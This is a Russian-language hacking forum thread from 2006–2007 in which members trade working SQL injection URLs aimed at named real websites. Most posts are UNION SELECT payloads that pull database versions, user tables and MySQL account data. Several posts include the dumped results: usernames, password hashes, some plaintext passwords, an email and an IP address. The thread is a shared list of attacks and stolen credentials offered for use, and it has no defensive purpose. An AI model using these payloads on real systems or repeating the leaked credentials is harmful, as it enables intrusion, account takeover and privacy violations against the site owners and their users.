SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://www.artiks.ru/consultant_text.php?id=-1+union+select+1,2,version(),4,5,6,database(),user(),9,10,11,12,13/*
    Code:
    http://www.klimt02.net/jewellers/index.php?item_id=-1+union+select+1,current_date(),database(),version(),5,user()/*
    Code:
    http://www.insomniacmania.com/news_default.php?id=9999999/**/union/**/select/**/user(),2,3,4,5,6/*
    Code:
    http://www.cbio.ru/modules/news/article.php?storyid=-1+union+select+1,user()/*
    Code:
    http://expo.chelsi.ru/mainexpo.php?id=-1+union+select+1,user(),database(),4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,current_date(),20/*
     
  2. Satirik

    Satirik Banned

    Joined:
    18 Aug 2005
    Messages:
    20
    Likes Received:
    12
    Reputations:
    0
    Code:
    http://www.allwebr.org.ru/index.php?id=-20+union+select+1,2/*
    не подобрать...
     
    1 person likes this.
  3. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Satirik, всё нормально подбираеца :)

    Code:
    http://www.allwebr.org.ru/index.php?id=-20+union+select+1,2,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15/*
     
  4. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    http://www.grafik-4u.de/index.php?page=2&c=1%20union%20select%201,concat(user_email,char(58),user_password),3,4%20from%20phpbb_users/*

    900 юзеров :)
     
    6 people like this.
  5. Gorn

    Gorn Member

    Joined:
    25 Oct 2006
    Messages:
    13
    Likes Received:
    8
    Reputations:
    2
    http://www.webchats.tv/webchat.php?ID=-1+union+select+1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+users/*
     
  6. Darkweider

    Darkweider Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    142
    Likes Received:
    13
    Reputations:
    0
    Блин ребят где вы такие сайты находите дырявые? Везде же вроде такой стандартный метод инъекций пофиксили. =)
     
    2 people like this.
  7. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Code:
    http://spas-edko.org.ua/photo_h.php?id=-9+union+select+1,2,3,4,5,6,concat(user_name,char(58),password),8+from+users/*
    Сенкс p-range, [ cash ] за помощь ;)
    Кто найдет админку, напишите в приват
     
    #467 Thanat0z, 11 Feb 2007
    Last edited: 11 Feb 2007
  8. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.searchmonster.org/index.php?l=-99+union+select+1,2,3,user,password,6+from+mysql.user/*

    gmedia_search4us:monster9 (спс Thanat0z)

    таблицу с юзерами не нашёл(
     
  9. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    www.muzon.tv

    Смотреть тайтл

    Code:
    http://www.muzon.tv/index.php?option=dld&cat=2&part=1&view=-1+union+select+concat(user,char(58),password)+from+mysql.user/*
    root:237e36116eef0637
    internati:0b89d2383b82c0b7


    Code:
    http://www.muzon.tv/index.php?option=dld&cat=2&part=1&view=-1+union+select+concat(login,char(58),pass)+from+users/*
    tolik:321
    danylko bogriv:anatolij
    fight!fire!:eek:ksana
    ksukha:eek:ksana


    Code:
    http://www.muzon.tv/index.php?option=dld&cat=2&part=1&view=-1+union+select+concat(user,char(58),pass)+from+admin/*
    roman:boykolviv123

    untp.org.ua

    Ivnision Power Board

    Code:
    http://www.untp.org.ua/index.php?id=-1+union+select+1,2,concat(name,char(58),member_login_key,char(58),email,char(58),ip_address),4,5,6+from+ibf_members/*
    Sashko:f1ea1bf75156c50f09791e7b210c1e69:[email protected]:80.84.190.34
     
    1 person likes this.
  10. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    http://www.parfumerist.ru/stat.php?stat_id=-1+union+select+1,user,password,4,5+from+mysql.user/*
    root:1dd500b601d8cc7d

    Code:
    http://www.gazclub.ru/sale/?sale_id=-1+union+select+1,2,current_date(),database(),version(),6,user(),8/*
    Code:
    http://www.kontec.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,database(),9,version(),user(),current_date(),13,14,15,16,17,18,19,20,21,22,23/*
    Code:
    http://hold5.ru/mstat.php?stat_id=-1+union+select+1,2,3,4,5,version(),7,8,9,10/*
    Code:
    http://www.granpri-flower.ru/stat.php?stat_id=-1+union+select+1,2,3,4,5,database(),user(),8,9/*
    
     
  11. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    http://muzspider.ru/download.php?id=-1+union+select+user(),2/* ;)
     
    #471 +StArT+, 12 Feb 2007
    Last edited: 12 Feb 2007
  12. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Вот еще:

    И еще одна (MsSql)

    И еще парочку (пруха у меня сегодня ) :)

     
    #472 kamaz, 12 Feb 2007
    Last edited: 12 Feb 2007
  13. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.philos.msu.ru/library.php?sid=-2+union+select+1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11+from+users/*
    admin:a98948bf0421ef30e4e19c0b4844600d

    Code:
    http://www.stumptuous.com/cms/displaysection.php?sid=-4+union+select+concat(username,0x3a,password),2+from+author/*
    krust:mongolkcndy

    Code:
    http://www.vectorlinux.com/topics.php?op=viewtopic&topic=-2+union+select+1,2,3,concat(name,0x3a,pass)+from+users/*
    Tony Brijeski:dd0ced770c9b3a5209a1c48dba1c6d86 - он там главный похоже)) хотя хз)))

    Code:
    http://www.singletrackworld.com/article.php?sid=-1+union+select+concat(name,0x3a,pass)+from+users/*
    admin:a1aa1235bfd3e72b88e8a9a5e9e2aafd (логин вродебы такой, вывести его не смог :D)

    Code:
    http://www.bityard.com/article.php?sid=-900+union+select+1,2,pass,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users/*
    hz:erUp/TO/6KzsE (логин найти не смог, что за крипт пасса тож не пойму, хотя мож это и открытый пасс :D)

    Code:
    http://www.peruinforma.com/imwebsite/article.php?sid=-28079+union+select+1,2,concat(name,0x3a,pwd),4,5,6,7,8+from+authors/*
    Admin:383b9cc05b994282c5b5e80202542ed9

    Code:
    http://www.emsch.ru/main.php?tid=-59+union+select+1,concat(username,0x3a,user_password)+from+users/*
    Admin:7c1b969e5afc49ea256879b8131cac3d

    Code:
    http://www.dubinushka.ru/m_files.php?ms_id=-54+union+select+1,concat(login,0x3a,pass)+from+users/*
    Kirilll:ba25703a7de3eaf0e093ce9da55e9abf
    Blade:c9ea45596a6ab3d5ab1f846d2dd0d9e9
     
    1 person likes this.
  14. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://shots.osdir.com/slideshows/slideshow.php?slide=9&release=-99+union+select+AES_DECRYPT(aes_encrypt(user(),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13/*
    
    =\
     
  15. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    ufs.com.ua

    http://www.ufs.com.ua/stories/showlaw.php?id=-427+union+select+concat(user,0x3a,password),2,3+from+mysql.user+limit+1,1/*
    Украинский Финансовый Сервер :D ох уж и не везет украинцам ;)
     
  16. Termin@L

    Termin@L Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    183
    Likes Received:
    43
    Reputations:
    53
    http://www.trb.org/news/blurb_detail.asp?id=2326
    я лол помогите кто-нить отсюда вытащить через подзапросы
    http://www.intersol.co.il/ispr/index.php?page=2'
     
    #476 Termin@L, 12 Feb 2007
    Last edited: 12 Feb 2007
  17. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    2Termin@L
    Там MsSql. http://www.trb.org/calendar/event.asp?id=1'
    Вроде бы тут ничего нельзя сделать :(
     
  18. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://planetelderscrolls.gamespy.com/fms/Image.php?id=-1+union+select+table_name,2,3,4+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
    
    =\
     
  19. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    }{0TT@БЬ)Ч
    юзай поиск по форуму, про эту скулю я писал раньше
    http://forum.antichat.ru/showpost.php?p=285086&postcount=482

    muzon.com

    Code:
    http://muzon.com/view_post.php?post_id=-1+union+select+1,concat(name,char(58),pass,char(58),mail,char(58),icq),3,4,5,6,7,8,9,10,11+from+users/*
    дофига юзеров, асек, мыл
     
    2 people like this.
  20. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.cisa.ru/news_full.php?nid=-26+union+select+session_user()/*&
     
Thread Status:
Not open for further replies.